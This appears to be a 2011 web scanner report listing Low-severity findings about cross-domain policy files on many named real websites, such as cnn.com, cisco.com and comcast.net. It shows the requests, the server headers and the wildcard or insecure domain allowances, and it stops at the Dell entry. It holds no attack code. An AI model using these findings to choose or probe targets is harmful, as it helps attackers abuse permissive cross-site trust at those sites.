HTTP/1.0 200 OK Server: Apache X-Pillar-Name: VAPROD Content-Type: application/xml Date: Sat, 02 Apr 2011 13:50:52 GMT Content-Length: 4088 Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="www.caranddriver.com" /> <allow-access-from domain="www.roadandtrack.com" /> <allow-access-from domain="www.jdpower.com" /> <allow-access-from domain="www.consumerguide.com" /> <allow-access-from domain="www.vehix.com" /> <allow-access-from domain="www.carsoup.com" /> <allow-access-from domain="www.cargurus.com" /> <allow-access-from domain="www.shopping.com" /> <allow-access-from domain="www.usnews.com" /> <allow-access-from domain="www.hybridcar.com" /> <allow-access-from domain="www.automedia.com" /> <allow-access-from domain="www.autospies.com" /> <allow-access-from domain="www.leftlanenews.com" /> <allow-access-from domain="www.autoweek.com" /> <allow-access-from domain="www.automart.com" /> <allow-access-from domain="www.thecarconnection.com" /> <allow-access-from domain="www.autotrader.com" /> <allow-access-from domain="www.autobytel.com" /> <allow-access-from domain="www.autoweb.com" /> <allow-access-from domain="www.autosite.com" /> <allow-access-from domain="www.car.com" /> <allow-access-from domain="www.carsmart.com" /> <allow-access-from domain="www.hybrid.com" /> <allow-access-from domain="www.myride.com" /> <allow-access-from domain="www.kbb.com" /> <allow-access-from domain="autos.yahoo.com" /> <allow-access-from domain="autos.msn.com" /> <allow-access-from domain="autos.aol.com" /> <allow-access-from domain="www.cars.com" /> <allow-access-from domain="www.edmunds.com" /> <allow-access-from domain="motifcdn.doubleclick.net"/> <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... <allow-access-from domain="m.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m2.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m3.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m.2mdn.net"/> ...[SNIP]... <allow-access-from domain="m2.2mdn.net"/> ...[SNIP]... <allow-access-from domain="betadfa.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="dfa.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="motifcdn2.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m1.2mdn.net"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net"/> ...[SNIP]... <allow-access-from domain="*.static.2mdn.net"/> ...[SNIP]... <allow-access-from domain="*.s0.2mdn.net"/> ...[SNIP]... <allow-access-from domain="*.s1.2mdn.net"/> ...[SNIP]... <allow-access-from domain="presentations.digitas.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.chicagotribune |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chicagotribune.com |
HTTP/1.0 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Length: 436 Content-Type: text/xml P3P: policyref="http://www Last-Modified: Thu, 03 Mar 2011 03:55:01 GMT ETag: "1b4-4d6f1115" Accept-Ranges: bytes Date: Sat, 02 Apr 2011 13:32:26 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.wibbitz.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.chow.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chow.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 13 Jul 2009 20:41:54 GMT Accept-Ranges: bytes Content-Length: 476 nnCoection: close Content-Type: application/xml Cache-Control: max-age=28278968 Expires: Thu, 23 Feb 2012 20:49:12 GMT Date: Sat, 02 Apr 2011 13:33:04 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.com.com"/> <allow-access-from domain="*.chow.com"/> <allow-access-from domain="*.gamespot.com"/> <allow-access-from domain="*.cbsig.net"/> <allow-access-from domain="*.cbs.com"/> <allow-access-from domain="*.cnet.cnwk"/> <allow-access-from domain="*.cnet.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.chron.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chron.com |
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) Last-Modified: Thu, 31 Mar 2011 00:53:27 GMT ETag: "16d-49fbcb89fefc0" Accept-Ranges: bytes Content-Length: 365 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV" Content-Type: application/xml Date: Sat, 02 Apr 2011 13:34:22 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.chron.com" /> <allow-access-from domain="chron.com" /> <allow-access-from domain="*.houstonchronicle.com" /> <allow-access-from domain="houstonchronicle.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cisco.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cisco.com |
HTTP/1.0 200 OK Server: Apache/2.0 Last-Modified: Mon, 14 Mar 2011 21:47:58 GMT ETag: "43d2df80" Accept-Ranges: bytes Content-Length: 454 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 13:38:17 GMT CDCHOST: ccows-sj-202 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:39:20 GMT Connection: close Set-Cookie: CP_GUTC=72.163.4.165 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.cisco.com --> <cross-domain-poli ...[SNIP]... <allow-access-from domain="*.cisco.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.static-cisco.com" /> <allow-access-from domain="*.ogilvy.edgesuite.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.classmates.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.classmates.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:23:30 GMT Server: Apache P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CON HIS OTPi OUR DELi SAMi PUBi IND OTC" Last-Modified: Wed, 23 Feb 2011 19:33:22 GMT ETag: "1df-4d656102" Accept-Ranges: bytes Content-Length: 479 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!-- Version: $Id: crossdomain.xml,v 1.4 2007-07-19 02:25:13 rrufh Exp $ --> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*.untd.com" /> <allow-access-from domain="*.cmates.com" /> <allow-access-from domain="*.classmates.com" /> <allow-access-from domain="*.cmcdn.com" /> <allow-access-from domain="*.cmatescdn.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.clocklink.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.clocklink.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:42:43 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 18 Mar 2011 13:51:58 GMT ETag: "6600b4a-10b-49ec214 Accept-Ranges: bytes Content-Length: 267 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.mysite.com --> <cross-domain-policy> <allow-access-from domain="*.clocklink.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.clubpenguin |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.clubpenguin.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:19 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Tue, 15 Apr 2008 01:09:24 GMT ETag: "2005b-17c-44adf0d0d9900" Accept-Ranges: bytes Content-Length: 380 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.clubpenguin.com" /> <allow-access-from domain="*.critteroo.com" /> <allow-access-from domain="*.critteroo.co.uk" /> <allow-access-from domain="*.clubpenguin.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cnbc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cnbc.com |
HTTP/1.1 200 OK Content-Type: text/xml Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:24:55 GMT Via: 1.1 C aicache6 Content-Length: 3794 X-Aicache-OS: 207.46.150.45:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Sat, 02 Apr 2011 13:25:55 GMT <?xml version="1.0"?> <!-- http://www.msnbc.com <cross-domain-policy> <allow-access-from domain="nbcsports.com" /> <allow-access-from domain="nbcsports.msnbc.com" /> <allow-access-from domain="*.nbcsports.com" /> <allow-access-from domain="*.nbcsports.msnbc.com" /> <allow-access-from domain="*.msnbc.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msnbc.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="msnbciweb" /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com" /> <allow-access-from domain="devi.ivillage.com" /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com"/> <allow-access-from domain="*.washingtonpost.com"/> <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.feedburner.com"/> <allow-access-from domain="msnbc-xpress" /> ...[SNIP]... <allow-access-from domain="*.cnbc.com"/> <allow-access-from domain="widgets.nbcuni.com"/> <allow-access-from domain="*.thenbcagency.com"/> <allow-access-from domain="*.veoh.com"/> <allow-access-from domain="*.imeem.com"/> <allow-access-from domain="*.livejournal.com"/> <allow-access-from domain="*.vox.com"/> <allow-access-from domain="*.sixapart.com"/> <allow-access-from domain="*.reuters.com"/> <allow-access-from domain="*.real.com"/> <allow-access-from domain="*.akamai.net"/> <allow-access-from domain="*.atlasrichmedia.co.au"/> <allow-access-from domain="*.atlasrichmedia.co.uk"/> <allow-access-from domain="*.atlasrichmedia.com"/> <allow-access-from domain="*.redcated"/> <allow-access-from domain="*.eyeblasterwiz.com"/> <allow-access-from domain="*.serving-sys.com"/> <allow-access-from domain="*.Abc.com"/> <allow-access-from domain="*.Abcnews.com"/> <allow-access-from domain="*.Accuweather.com"/> <allow-access-from domain="*.Cbs.com"/> <allow-access-from domain="*.cbsnews.com"/> <allow-access-from domain="*.discovery.com"/> <allow-access-from domain="*.ew.com"/> <allow-access-from domain="*.fox.com"/> <allow-access-from domain="*.foxnews.com"/> <allow-access-from domain="*.ign.com"/> <allow-access-from domain="*.people.com"/> <allow-access-from domain="*.tvguide.com"/> <allow-access-from domain="*.weather.com"/> <allow-access-from domain="*.vh1.com"/> <allow-access-from domain="*.usatoday.com"/> <allow-access-from domain="*.bmg.com"/> <allow-access-from domain="*.bmgmusic.com"/> <allow-access-from domain="*.people.com"/> <allow-access-from domain="*.fluid.nl"/> <allow-access-from domain="*.myspace.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.newsvine.com"/> <allow-access-from domain="*.stamen.com" /> <allow-access-from domain="64.207.156.207"/> <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.s-msn.com" /> <allow-access-from domain="*.telemundo.com" /> <allow-access-from domain="*.unicornmedia.com" /> <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.intellitxt.com"/> <allow-access-from domain="*.panachetech.com"/> <allow-access-from domain="*.interpolls.com"/> <allow-access-from domain="*.unicornmedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.unicornapp.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com" secure="false"/> ...[SNIP]... <allow-access-from domain="today.com" /> <allow-access-from domain="*.today.com" /> <allow-access-from domain="*.pointroll.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cnet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cnet.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:05 GMT Server: Apache Vary: Host Accept-Ranges: bytes P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Content-Length: 3257 Keep-Alive: timeout=15, max=988 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.bnet.com" /> <allow-access-from domain="*.builder.com" /> <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="*.cbsgames.com" /> <allow-access-from domain="*.cbsinteractive.com" /> <allow-access-from domain="*.cbsnews.com" /> <allow-access-from domain="*.cbssports.com" /> <allow-access-from domain="*.chat.com" /> <allow-access-from domain="*.chow.com" /> <allow-access-from domain="*.chowhound.com" /> <allow-access-from domain="*.cnet.com" /> <allow-access-from domain="*.*.cnet.com" /> <allow-access-from domain="*.cnettv.com" /> <allow-access-from domain="*.*.com.com" /> <allow-access-from domain="*.com.com" /> <allow-access-from domain="*.download.com" /> <allow-access-from domain="*.filmspot.com" /> <allow-access-from domain="*.findarticles.com" /> <allow-access-from domain="*.gamefaqs.com" /> <allow-access-from domain="*.gamerankings.com" /> <allow-access-from domain="*.gamespot.com" /> <allow-access-from domain="*.help.com" /> <allow-access-from domain="*.iphoneatlas.com" /> <allow-access-from domain="*.itpapers.com" /> <allow-access-from domain="*.juke.com" /> <allow-access-from domain="*.last.fm" /> <allow-access-from domain="*.macfixit.com" /> <allow-access-from domain="*.macfixitforums.com" /> <allow-access-from domain="*.maxpreps.com" /> <allow-access-from domain="*.metacritic.com" /> <allow-access-from domain="*.mp3.com" /> <allow-access-from domain="*.moblogic.tv" /> <allow-access-from domain="*.moneywatch.com" /> <allow-access-from domain="*.movietome.com" /> <allow-access-from domain="*.mysimon.com" /> <allow-access-from domain="*.ncaa.com" /> <allow-access-from domain="*.news.com" /> <allow-access-from domain="*.ourchart.com" /> <allow-access-from domain="*.search.com" /> <allow-access-from domain="*.shareware.com" /> <allow-access-from domain="*.shopper.com" /> <allow-access-from domain="*.smartplanet.com" /> <allow-access-from domain="*.sportsgamer.com" /> <allow-access-from domain="*.sportsline.com" /> <allow-access-from domain="*.startrek.com" /> <allow-access-from domain="*.techrepublic.com" /> <allow-access-from domain="*.theinsider.com" /> <allow-access-from domain="*.trupreps.com" /> <allow-access-from domain="*.tv.com" /> <allow-access-from domain="*.urbanbaby.com" /> <allow-access-from domain="*.versiontracker.com" /> <allow-access-from domain="*.wallstrip.com" /> <allow-access-from domain="*.webware.com" /> <allow-access-from domain="*.winfiles.com" /> <allow-access-from domain="*.zdnet.com" /> <allow-access-from domain="*.zdnet.com.au" /> <allow-access-from domain="*.zdnet.com.uk" /> <allow-access-from domain="*.zdnetasia.com" /> <allow-access-from domain="*.pluggd.com"/> <allow-access-from domain="*.userplane.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.motifcdn2.doubleclick <allow-access-from domain="*.juegasgroup.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cnn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cnn.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:38:16 GMT Server: Apache Set-Cookie: CG=US:TX:Dallas; path=/ Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT Accept-Ranges: bytes Content-Length: 2326 Cache-Control: max-age=3600 Expires: Sat, 02 Apr 2011 13:37:32 GMT Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.cnn.com"/> <allow-access-from domain="*.turner.com"/> <allow-access-from domain="*.cnn.net"/> <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="creatives.doubleclick.net"/> <allow-access-from domain="m.2mdn.net"/> <allow-access-from domain="m2.2mdn.net"/> <allow-access-from domain="*.2mdn.net"/> <allow-access-from domain="*.i-traffic.com"/> <allow-access-from domain="ar.atwola.com"/> <allow-access-from domain="*.itraffic.com"/> <allow-access-from domain="*.agency.com"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.time.com"/> <allow-access-from domain="*.VillageVoice.com"/> <allow-access-from domain="*.nymag.com"/> <allow-access-from domain="*.salon.com"/> <allow-access-from domain="*.secondthought.com"/> <allow-access-from domain="*.clk4.com"/> <allow-access-from domain="servedby.advertising.com"/> <allow-access-from domain="bannerfarm.advertising <allow-access-from domain="*.advertising.com"/> <allow-access-from domain="*.crewintegrated.com"/> <allow-access-from domain="gfx.klipmart.com"/> <allow-access-from domain="*.klipmart.com"/> <allow-access-from domain="*.cnnexpansion.com"/> <allow-access-from domain="mediacache.travelzoo.com"/> <allow-access-from domain="*.cdn.turner.com"/> <allow-access-from domain="staging.barbariangroup <allow-access-from domain="*.spreadomat.net"/> <allow-access-from domain="CNNShirts.spreadshirt.com"/> <allow-access-from domain="72.3.226.28"/> <allow-access-from domain="isg-marketing.com"/> <allow-access-from domain="*.isg-marketing.com"/> <allow-access-from domain="*isgwidgets.s3.amazonaws <allow-access-from domain="*.oprah.com"/> <allow-access-from domain="zuse.networld.at"/> <allow-access-from domain="*.fusebox.com"/> <allow-access-from domain="*.cnnpromos.com"/> <allow-access-from domain="*.rtm.com"/> <allow-access-from domain="*.rtmweb.rtm.com"/> <allow-access-from domain="*.stamen.com"/> <allow-access-from domain="*.prizelogic.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cobaltnitra |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cobaltnitra.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:56:36 GMT Server: Apache/2.2.3 (Oracle) DAV/2 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: click_tracker=10.64.64.6 Last-Modified: Wed, 01 Sep 2010 15:08:22 GMT ETag: "1d7206-263-48f3411876580 Accept-Ranges: bytes Content-Length: 611 Content-Type: text/xml Set-Cookie: BIGipServernitra X-Cache: MISS from backend02-1 X-Cache-Lookup: MISS from backend02-1:4001 X-Cache: MISS from frontend02 X-Cache-Lookup: MISS from frontend02:3128 Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid) Proxy-Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.cobaltnitra.com" /> <allow-access-from domain="*.motorplace.com" /> <allow-access-from domain="*.cobaltgroup.com" /> <allow-access-from domain="*.cobaltmotors1.com" /> <allow-access-from domain="*.webedge.com" /> <allow-access-from domain="*.lexusdealer.com" /> <allow-access-from domain="*.vwdealer.com" /> <allow-access-from domain="*.cpbinteractive.com" /> <allow-access-from domain="*.vw.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.collegeboard |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.collegeboard.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:02 GMT Server: Apache Last-Modified: Thu, 20 May 2010 19:40:23 GMT ETag: "116-4870bbed717c0" Accept-Ranges: bytes Content-Length: 278 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.collegeboard.com" /> <allow-access-from domain="*.collegeboard.org" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.comcast.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.comcast.net |
HTTP/1.0 200 OK Server: Apache/2.0.58 (Unix) Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT ETag: "25d5d5-444-f82380" Accept-Ranges: bytes Content-Length: 1092 Content-Type: application/xml Cache-Control: max-age=2592000 Date: Sat, 02 Apr 2011 12:37:55 GMT Connection: close <?xml version="1.0"?> <!--static--> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.xfinity.com"/> <allow-access-from domain="*.fancast.com"/> <allow-access-from domain="beta.comcast.net" /> <allow-access-from domain="*.cimcontent.net" /> <allow-access-from domain="chrome.comcast.net" /> <allow-access-from domain="static.comcast.net" /> <allow-access-from domain="por-img.cimcontent.net" /> <allow-access-from domain="comcast.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.comcast.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.comcastonline.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.att.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.xcal.tv" secure="false"/> ...[SNIP]... <allow-access-from domain="*.247realmedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.teamcomcast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.247realmedia.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.consumerr |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.consumerreports.org |
HTTP/1.1 200 OK Server: Netscape-Enterprise Date: Sat, 02 Apr 2011 13:38:39 GMT Content-type: application/rss+xml Last-modified: Sat, 02 Apr 2011 12:37:52 GMT Content-length: 661 Accept-ranges: bytes Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="*.consumerreports.org" secure="false"/> ...[SNIP]... <allow-access-from domain="*.consumer.org" secure="false"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.consumersearch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.consumersearch.com |
HTTP/1.0 200 OK Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.2.6 X-Drupal-Cache: MISS Last-Modified: Sat, 02 Apr 2011 13:33:51 +0000 ETag: "1301751231"-gzip nnCoection: close Content-Type: text/xml Expires: Sat, 02 Apr 2011 13:33:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:33:51 GMT Content-Length: 597 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.consumer ...[SNIP]... <allow-access-from domain="*.www.consumersearch.com" /> <allow-access-from domain="cs6.peter" /> <allow-access-from domain="*.cs6.peter" /> <allow-access-from domain="www2.comsumersearch.com" /> <allow-access-from domain="*.www2.comsumersearch.com" /> <allow-access-from domain="d62.consumersearch.com" /> <allow-access-from domain="*.d62.consumersearch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.costco.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.costco.com |
HTTP/1.1 200 OK X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:39:31 GMT Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Mon, 28 Mar 2011 22:23:08 GMT ETag: "02eecb696edcb1:2d96" Content-Length: 161 <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*.costco.com" /> <allow-access-from domain="*.costco.ca" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dailyfinance |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dailyfinance.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:59:48 GMT Server: Apache Accept-Ranges: bytes Content-Length: 221 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.aolcdn.com" /> <allow-access-from domain="*.test.aol.com" /> < ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dailykos.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dailykos.com |
HTTP/1.0 200 OK Server: Apache Vary: Accept-Encoding Content-Type: application/xml Date: Sat, 02 Apr 2011 14:09:30 GMT Accept-Ranges: bytes ETag: "c2e9f-4f3-49c267bd3a1c0" Connection: close Last-Modified: Sun, 13 Feb 2011 09:23:27 GMT Content-Length: 1267 <?xml version="1.0"?> <!-- Macromedia enforces some security policies in Flash that keep movies on one domain from loading data files on another domain. If a Flash movie is trying to load data from ...[SNIP]... <allow-access-from domain="dailykos.com" /> <allow-access-from domain="*.dailykos.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dailymotion |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dailymotion.com |
HTTP/1.0 200 OK Server: DMS/1.0.42 Vary: Accept-Encoding Cache-Control: max-age=86400 Content-Type: text/xml; charset=utf-8 P3p: policyref="http://www Date: Sat, 02 Apr 2011 05:19:44 GMT X-DM-Cache: DO Accept-Ranges: bytes X-Dm-Page: us.html.crossdomain Connection: close X-Cache-Info: cached Content-Length: 4368 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*.dailymotion.com"/><allow-access-from domain="*.dmcdn.net"/><allow-access-from domain="*.virgilio.it"/><allow-access-from domain="*.dailymotion.pl"/><allow-access-from domain="*.lunchbox-lustucrus ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dallascowboys |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dallascowboys.com |
HTTP/1.0 200 OK Server: Apache/2.0.54 (Debian GNU/Linux) JRun/4.0 PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e ETag: "17900ac-75-cd42df00" Accept-Ranges: bytes Cache-Control: max-age=300 Content-Type: application/xml Age: 768 Date: Sat, 02 Apr 2011 14:00:16 GMT Last-Modified: Wed, 23 Jun 2010 04:16:28 GMT Expires: Sat, 02 Apr 2011 14:00:46 GMT Content-Length: 117 Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.2cimple.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dallasnews.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dallasnews.com |
HTTP/1.1 200 OK Set-Cookie: ececluster=R1231783856; path=/; expires=Sun, 03-Apr-2011 13:38:53 GMT Last-Modified: Thu, 09 Dec 2010 15:43:18 GMT X-Powered-By: Servlet/2.5 JSP/2.1 x-svrl-ap: test- Content-Type: text/xml Vary: Accept-Encoding cache-control: max-age = 120 Content-Length: 461 Date: Sat, 02 Apr 2011 13:36:51 GMT X-Varnish: 1463194522 1463153058 Age: 411 Via: 1.1 varnish Connection: close X-Cache: HIT:2 x-svrl: V4 <?xml version="1.0" encoding="UTF-8"?> <!-- Document : crossdomain.xml Created on : November 26, 2010, 11:26 AM Author : svorin Description: Allow the following domain a ...[SNIP]... <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.wunderground.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.datpiff.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.datpiff.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:21 GMT Server: Apache Last-Modified: Mon, 29 Nov 2010 00:45:49 GMT ETag: "5c900fb-ef-4962664afa940 Accept-Ranges: bytes Content-Length: 239 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.datpiff.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dell.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dell.com |
